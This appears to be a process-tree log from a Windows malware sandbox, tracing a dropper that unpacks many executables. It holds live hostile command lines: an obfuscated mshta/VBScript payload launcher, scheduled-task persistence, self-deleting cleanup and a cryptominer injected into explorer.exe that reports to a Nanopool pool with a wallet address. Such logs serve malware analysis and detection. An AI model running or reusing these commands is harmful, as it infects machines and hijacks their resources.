C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471813⤵
-
C:\Users\Admin\AppData\Local\Temp\44-3b390-e61-b16ae-2afb03aaf6b5e\Tejiwaekoco.exe"C:\Users\Admin\AppData\Local\Temp\44-3b390-e61-b16ae-2afb03aaf6b5e\Tejiwaekoco.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jan3noyn.cqr\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\jan3noyn.cqr\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\jan3noyn.cqr\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 30414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f3botyfq.ndf\installer.exe /qn CAMPAIGN="654" & exit12⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\f3botyfq.ndf\installer.exeC:\Users\Admin\AppData\Local\Temp\f3botyfq.ndf\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xjfucdnu.0vx\anyname.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\xjfucdnu.0vx\anyname.exeC:\Users\Admin\AppData\Local\Temp\xjfucdnu.0vx\anyname.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygjyirqt.wer\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ygjyirqt.wer\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ygjyirqt.wer\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 30414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1wk2nmg.msl\autosubplayer.exe /S & exit12⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\CtdIF68bUqoF1YIoatKKhDHU.exe"C:\Users\Admin\Documents\CtdIF68bUqoF1YIoatKKhDHU.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qSEyiynEt2usFH1F3ILQKqqn.exe"C:\Users\Admin\Documents\qSEyiynEt2usFH1F3ILQKqqn.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im M6yxelA3v8dSsoMbE76obpxX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\M6yxelA3v8dSsoMbE76obpxX.exe" & del C:\ProgramData\*.dll & exit8⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im M6yxelA3v8dSsoMbE76obpxX.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Checks processor information in registry
- Delays execution with timeout.exe
- Enumerates system info in registry
-
C:\Users\Admin\Documents\ODUY8h_dRmSPnowXWsMuPfSv.exe"C:\Users\Admin\Documents\ODUY8h_dRmSPnowXWsMuPfSv.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\Documents\tbb_EBPH2NSFZl1dRJn3T23f.exe"C:\Users\Admin\Documents\tbb_EBPH2NSFZl1dRJn3T23f.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\faix46uT7fe2coyITPJI_gRZ.exe"C:\Users\Admin\Documents\faix46uT7fe2coyITPJI_gRZ.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\0AdgPZuLzdDXmeGBdZzAfKFP.exe"C:\Users\Admin\Documents\0AdgPZuLzdDXmeGBdZzAfKFP.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 2847⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\xaiTGuks31gRBwJQPjqa0zco.exe"C:\Users\Admin\Documents\xaiTGuks31gRBwJQPjqa0zco.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 2447⤵
- Program crash
-
C:\Users\Admin\Documents\bT8zIbHyWAmMcMjVcVQvdQAq.exe"C:\Users\Admin\Documents\bT8zIbHyWAmMcMjVcVQvdQAq.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\dUKKHs5vnqUP87SnnwiHWDjl.exe"C:\Users\Admin\Documents\dUKKHs5vnqUP87SnnwiHWDjl.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\y4wO4hM7qudHWZvXuMrAHxuB.exe"C:\Users\Admin\Documents\y4wO4hM7qudHWZvXuMrAHxuB.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\o3jVhWpzGcwB1rSJvh8Bh1Jy.exe"C:\Users\Admin\Documents\o3jVhWpzGcwB1rSJvh8Bh1Jy.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 2487⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\vvzQen9T8gn95mJC6pOP_HDo.exe"C:\Users\Admin\Documents\vvzQen9T8gn95mJC6pOP_HDo.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 3087⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\sqINKvqX_Z4207Sj2ScquzD3.exe"C:\Users\Admin\Documents\sqINKvqX_Z4207Sj2ScquzD3.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 2807⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\W2v6b5bjqpQBt1noCXNL0jMG.exe"C:\Users\Admin\Documents\W2v6b5bjqpQBt1noCXNL0jMG.exe"6⤵
-
C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF ""== "" for %w In ( "C:\Users\Admin\Documents\KsVaEglcr_unmivRYj1qqzHr.exe" ) do taskkill /F -iM "%~nxw"8⤵
-
C:\Users\Admin\AppData\Local\Temp\CndH5V.EXeCndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -iM "KsVaEglcr_unmivRYj1qqzHr.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\GDhGY7j0oJbM3Xozvf7HGWwQ.exe"C:\Users\Admin\Documents\GDhGY7j0oJbM3Xozvf7HGWwQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"C:\Users\Admin\Documents\X5evWPL7qD3xAYZGheHG_oYH.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\wqER3NvWNOXWCYzBLNICJiQQ.exe"C:\Users\Admin\Documents\wqER3NvWNOXWCYzBLNICJiQQ.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\8199809.scr"C:\Users\Admin\AppData\Roaming\8199809.scr" /S7⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6268 -s 21208⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\8235804.scr"C:\Users\Admin\AppData\Roaming\8235804.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri008493e5f0216a2ff.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri008493e5f0216a2ff.exeFri008493e5f0216a2ff.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4260 -s 16526⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00ca113a71b9d765e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00ca113a71b9d765e.exeFri00ca113a71b9d765e.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00ca113a71b9d765e.exeC:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00ca113a71b9d765e.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00b338dc203.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00b338dc203.exeFri00b338dc203.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6947549.scr"C:\Users\Admin\AppData\Roaming\6947549.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4765798.scr"C:\Users\Admin\AppData\Roaming\4765798.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6116 -s 21207⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\8736379.scr"C:\Users\Admin\AppData\Roaming\8736379.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0084ec6e65fc45d4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri0084ec6e65fc45d4.exeFri0084ec6e65fc45d4.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 6087⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 3088⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri006a16df1a6e9ebb.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri006a16df1a6e9ebb.exeFri006a16df1a6e9ebb.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5100 -ip 51001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1652 -ip 16521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5800 -ip 58001⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exe1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 4523⤵
- Program crash
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6040 -ip 60401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5944 -ip 59441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5820 -ip 58201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5292 -ip 52921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4848 -ip 48481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ( "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5796 -ip 57961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4128 -ip 41281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 720 -p 6116 -ip 61161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5756 -ip 57561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5920 -ip 59201⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4260 -ip 42601⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 668 -p 6268 -ip 62681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5500 -ip 55001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1252 -ip 12521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1CC5.exeC:\Users\Admin\AppData\Local\Temp\1CC5.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1CC5.exeC:\Users\Admin\AppData\Local\Temp\1CC5.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2FB2.exeC:\Users\Admin\AppData\Local\Temp\2FB2.exe1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Users\Admin\AppData\Local\Temp\2FB2.exeC:\Users\Admin\AppData\Local\Temp\2FB2.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1724 -ip 17241⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 3400 -ip 34001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\4CA1.exeC:\Users\Admin\AppData\Local\Temp\4CA1.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6BC3.exeC:\Users\Admin\AppData\Local\Temp\6BC3.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
